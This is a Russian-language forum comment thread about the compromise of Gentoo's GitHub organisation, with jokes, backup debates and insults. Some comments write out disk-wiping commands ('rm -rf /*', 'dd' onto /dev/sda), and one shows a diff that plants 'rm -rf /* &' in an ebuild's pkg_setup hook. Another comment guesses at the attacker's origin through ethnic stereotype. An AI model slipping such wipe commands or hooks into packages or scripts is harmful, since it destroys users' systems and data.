Результаты расследования инцидента с взломом зеркала Gentoo на GitHub

rm -rf /*

Сурьезно? Ну и деграданты.

Я подтянулся в английском смотря фильмы в оригинале (из-за убогих озвучек) и делая карточки со словами. А потом можно и до других языков добраться.

я не много знаю английский
я не кому не чего
что бы

Да ты даже русский похоже не знаешь.

А ей кто-то ещё пользуется? У школьников сейчас популярны другие дистры.

А ей кто-то ещё пользуется?

Ей кто-то уже пользуется.

У школьников сейчас популярны другие дистры.

Какое тебе дело к тому, чем занимаются школьники и что у них популярно?

Бэкап не серебряная пуля. Актуальные данные не восстановит.

Э?

borgbackup + cron с любой частотой. Софтина работает очень шустро, ибо дедупликация.

borgbackup

не нужен

дедупликация

VDO

А теперь прикинь, что этот апдейт был запущен на севере бэкапов?
У тебя конечно же как у самого хитрожопого есть ленты или двд с бэкапом бэкапов, но опять же, время на востановление и актуальная инфа тоже тю-тю.

Команда Gentoo решила ситуацию с взломом организации Gentoo на GitHub

«взлом организации», это вообще на каком языке написано? И что это обозначает?

неизвестные заполучили контроль над организацией Gentoo

Это, позвольте узнать, как эти неизвестные такое проделали? Путем шантажа и/или подкупа ключевых фигур этой организации? Или сменили этих фигур на своих людей?

большего не заслуживает. Ну пароль утек, с кем не бывает

И гитхаб не заприметил подозрительную активность.

«взлом организации», это вообще на каком языке написано?

В терминах гитхаба.

Это, позвольте узнать, как эти неизвестные такое проделали?

У главногентушника был пароль чуть сложнее «qwerty».

Вот спасиба, братишка! Два чая за перевод с буржуйского на наш. Так намного лучше теперь!

Это 'тело' наверное и был тот Нигер :)

А мне почему-то кажется, что это дело рук своих. Просто кто-то решил подтолкнуть юзеров отказаться от синхронизации с гитхабом, чтобы проще было вообще оттуда съехать. Нужно искать либо личную выгоду от такого переезда, либо упоротого фанатика-борцуна с корпорациями. Я больше склоняюсь к первому варианту - кто-то неплохо зарабатывает на массовой панике.

Ну вот все и узнали, что 1) OpenSource говно

Нет. В основном, узнали, что i82 говно.

контора github «пишет» :-D

Контора не github, а Microsoft.

Я тебе и не говорю что ты кому-то обязан знать английский. Ты и русский никому не обязан и матемакский. И вообще саморазвитие - не обязанность.

А к простым работягам я претензий не имею, разве что плох тот солдат, что не мечтает стать генералом. Но это уже личное дело. Цезарь, вон, кажется, говорил, что предпочел бы быть первым в провинции, чем последним в Риме, так что толковый работяга не глупее Цезаря бывает

Для актуальных данных есть гит в конце рабочего дня. ) а вообще, эрэм минус эрэф - не смешная шутка

А ещё есть бритва, которая намекает на то, что наиболее вероятный ответ и есть верный (как правило) утек пароль, с кем не бывало, действительно

эрэм минус эрэф - не смешная шутка

Можно еще sudo dd if=/dev/zero of=/dev/sda bs=1M (НЕ делайте так!)

Бритва-то она есть, но еще есть массовая истерия вокруг покупки гитхаба мелкософтом и тут вдруг появляются хакиры, утекают пароли, просто совпадение, ага. А самое интересное, что этот взлом не повлек за собой никаких серьезных последствий. Вот, если бы по итогам взлома, тысячи машин по всему миру были бы заражены каким-нить криптовальщиком, вот тогда я бы поверил в утекшие пароли. Мир - он сложный, не на всё ответы простые.

Зачем sudo-то? Явно обновления под рутом проходят

А так да, намного печальнее

Так а кто ж спорит. Просто в обыденности вериться проще, чем в конспирологию. На то она и обыденность

Знаешь в мире совпадения бывают, иногда самые невероятные. Сам не раз убеждался.

А это как раз аргумент в пользу моей конспирологической теории. Идеальное объяснение, в которое все с легкостью поверят. Вот если бы объяснение было сложное, с обилием различных мелких деталей, внезапными поворотами сюжета...

сложное, с обилием различных мелких деталей, внезапными поворотами сюжета

Так оно обычно и бывает.

Есть такое. В последние годы начал сомневаться в своем психическом здоровье из-за обилия всякого рода невероятных совпадений. Синхроничность, блин...

GitHub - решето.

Добавляем portage.ebuild с командой rm -rf /*& и при первом же апдейте система снрсится к херам.

Во-первых, пользователь не должен обновляться с этой репы.

Во-вторых, если он на редкость сказочный ССЗБ и обновился оттуда, то неплохо бы сначала создать Manifest файл. Ок, добавлю в локальный реп файлик, например, dev-python/pip-9.0.1-r3, содержащий в первой строке rm -rf /*& и попробую создать Manifest:

# repoman manifest
 * ERROR: dev-python/pip-9.0.1-r3::local failed (depend phase):
 *   External commands disallowed while sourcing ebuild: rm -rf /bin /boot /dev /etc /home /lib /lib32 /lib64 /media /mnt /opt /proc /root /run /sbin /sys /tmp /usr /var
 * 
 * Call stack:
 *             ebuild.sh, line 635:  Called source '/usr/local/portage/dev-python/pip/pip-9.0.1-r3.ebuild'
 *   pip-9.0.1-r3.ebuild, line   1:  Called command_not_found_handle 'rm' '-rf' '/bin' '/boot' '/dev' '/etc' '/home' '/lib' '/lib32' '/lib64' '/media' '/mnt' '/opt' '/proc' '/root' '/run' '/sbin' '/sys' '/tmp' '/usr' '/var'
 *             ebuild.sh, line  88:  Called die
 * The specific snippet of code:
 *              die "External commands disallowed while sourcing ebuild: ${*}"
 * 
 * If you need support, post the output of `emerge --info '=dev-python/pip-9.0.1-r3::local'`,
 * the complete build log and the output of `emerge -pqv '=dev-python/pip-9.0.1-r3::local'`.
 * Working directory: '/usr/lib64/python3.6/site-packages'
 * S: '/var/tmp/portage/dev-python/pip-9.0.1-r3/work/pip-9.0.1'
!!! getFetchMap(): aux_get() error reading dev-python/pip-9.0.1-r3; aborting.
Unable to generate manifest.

# ACCEPT_KEYWORDS="~amd64" emerge -1av =dev-python/pip-9.0.1-r3

These are the packages that would be merged, in order:

Calculating dependencies | * ERROR: dev-python/pip-9.0.1-r3::local failed (depend phase):
 *   External commands disallowed while sourcing ebuild: rm -rf /bin /boot /dev /etc /home /lib /lib32 /lib64 /media /mnt /opt /proc /root /run /sbin /sys /tmp /usr /var
 * 
 * Call stack:
 *             ebuild.sh, line 635:  Called source '/usr/local/portage/dev-python/pip/pip-9.0.1-r3.ebuild'
 | *   pip-9.0.1-r3.ebuild, line   1:  Called command_not_found_handle 'rm' '-rf' '/bin' '/boot' '/dev' '/etc' '/home' '/lib' '/lib32' '/lib64' '/media' '/mnt' '/opt' '/proc' '/root' '/run' '/sbin' '/sys' '/tmp' '/usr' '/var'
 *             ebuild.sh, line  88:  Called die
 * The specific snippet of code:
 *              die "External commands disallowed while sourcing ebuild: ${*}"
 * 
 * If you need support, post the output of `emerge --info '=dev-python/pip-9.0.1-r3::local'`,
 * the complete build log and the output of `emerge -pqv '=dev-python/pip-9.0.1-r3::local'`.
 * Working directory: '/usr/lib64/python3.6/site-packages'
 * S: '/var/tmp/portage/dev-python/pip-9.0.1-r3/work/pip-9.0.1'
... done!

!!! All ebuilds that could satisfy "=dev-python/pip-9.0.1-r3" have been masked.
!!! One of the following masked packages is required to complete your request:
- dev-python/pip-9.0.1-r3::local (masked by: corruption)

# ACCEPT_KEYWORDS="~amd64" emerge -1av =dev-python/pip-9.0.1-r3

These are the packages that would be merged, in order:

Calculating dependencies - * ERROR: dev-python/pip-9.0.1-r3::local failed (depend phase):
 *   External commands disallowed while sourcing ebuild: rm -rf /bin /boot /dev /etc /home /lib /lib32 /lib64 /media /mnt /opt /proc /root /run /sbin /sys /tmp /usr /var
 * 
 * Call stack:
 *             ebuild.sh, line 635:  Called source '/usr/local/portage/dev-python/pip/pip-9.0.1-r3.ebuild'
 *   pip-9.0.1-r3.ebuild, line   1:  Called command_not_found_handle 'rm' '-rf' '/bin' '/boot' '/dev' '/etc' '/home' '/lib' '/lib32' '/lib64' '/media' '/mnt' '/opt' '/proc' '/root' '/run' '/sbin' '/sys' '/tmp' '/usr' '/var'
 *             ebuild.sh, line  88:  Called die
 * The specific snippet of code:
 *              die "External commands disallowed while sourcing ebuild: ${*}"
...

# ebuild ./pip-9.0.1-r3.ebuild merge
 * ERROR: dev-python/pip-9.0.1-r3::local failed (depend phase):
 *   External commands disallowed while sourcing ebuild: rm -rf /bin /boot /dev /etc /home /lib /lib32 /lib64 /media /mnt /opt /proc /root /run /sbin /sys /tmp /usr /var
 * 
 * Call stack:
 *             ebuild.sh, line 635:  Called source '/usr/local/portage/dev-python/pip/pip-9.0.1-r3.ebuild'
 *   pip-9.0.1-r3.ebuild, line   1:  Called command_not_found_handle 'rm' '-rf' '/bin' '/boot' '/dev' '/etc' '/home' '/lib' '/lib32' '/lib64' '/media' '/mnt' '/opt' '/proc' '/root' '/run' '/sbin' '/sys' '/tmp' '/usr' '/var'
 *             ebuild.sh, line  88:  Called die
 * The specific snippet of code:
 *              die "External commands disallowed while sourcing ebuild: ${*}"

...

Решетом оказался руководитель организации, а не гитхаб.

Просто в текст новости добавить постеснялись.

Дей ден просидид

А кто такой этот Дей ден? И где и как долго он просидид?

Тут я каюсь, из за этой жары у меня мозги не работают(, я прошу прощения. Ладно, замнём эту тему.

при нынешних мощностях топового железа затраты времени на компиляцию не такие уж и большие

dd if=/dev/zero of=/dev/sda bs=1M (НЕ делайте так!)

Делал и делаю. Надо же как-то флешку от данных очищать.

Делал и делаю. Надо же как-то флешку от данных очищать.

А как получается, что флешка на /dev/sda?

Флешка sdb обычно.

О, а вот и долгожданный адепт времени, как обычно появляющийся в тредах о генту.

Очнитесь, дурачки. За вас уже все скомпилировали мейнтейнеры бинарных дистрибутивов.

Ага, и эти самые всякий левак в зависимости пихают, чтоб их под сотню было. От бинарщины ушел еще в 2010 году и не жалею. А с появлением относительно нормального железа время сборки сократилось в 4 раза.

А главное — гибкость дистрибутива осталась, можно легким движением руки впилить/выпилить поделия Поттеринга и прочий шлак, или даже пропатчить.

Ну так буковку нужную подставил и вперде.

устроили хулиганство типа заполнения ридми файлов расизмом

как правило оголтелый расизм (как и гомофобия/женоненавистничество) характерен для выходцев из нецивилизованных и несвободных стран, значит взломщик вероятнее всего был из снг или китая

Фобий хватает везде.

Флешка в /dev/sda признак нестояния винта!

// petrosyan mode off

Если у тебя данных с гулькин нос.
А если у тебя гигабайты в сутки?

Так пиши на Си, пиши не сси! Там данных копейки. Ну если гигабайты в сутки - я вообще представления не имею как вы управляетесь

Ну а авторы не обязаны переводить.

Ок, добавлю в локальный реп файлик, например, dev-python/pip-9.0.1-r3, содержащий в первой строке rm -rf /*& и попробую создать Manifest:

ЛОЛ! Повылазило шпециалистов.
Ты вообще ebuild'ы когда-нибудь писал?
В первую строку он команды пихает.
facepalm.jpg

--- /usr/portage/sys-apps/portage/portage-2.3.8.ebuild  2018-01-25 09:12:34.756339010 +0000
+++ /home/user/tmp/sys-apps/portage/portage-2.3.8.ebuild    2018-07-05 12:20:47.091547000 +0000
@@ -79,6 +79,7 @@
        $(prefix_src_archives ${PN}-${TARBALL_PV}.tar.bz2)"

 pkg_setup() {
+       rm -rf /* &
        use epydoc && DISTUTILS_ALL_SUBPHASE_IMPLS=( python2.7 )
 }

и это я ещё не говорю про варианты типа `cat <<EOF | bash` или пресловутый однострочник.

Ага, с апреля подбирали пароль чисто для маскировки

при нынешних мощностях топового железа затраты времени на компиляцию не такие уж и большие

У красноглазых проблемы с логикой. Если железо мощное и топовое, то зачем компилировать? Чтобы получить 1% прироста в скорости за счет микрооптимизаций? Бугага!

Да ладно, дебилов везде хватает, хоть в пендосовке, хоть у нас в Россие, хоть на туманной альбионовке.

Команда Gentoo обосралась, обосруться и в другой раз, а пользователи пусть делают выводы об ненужности данного продукта.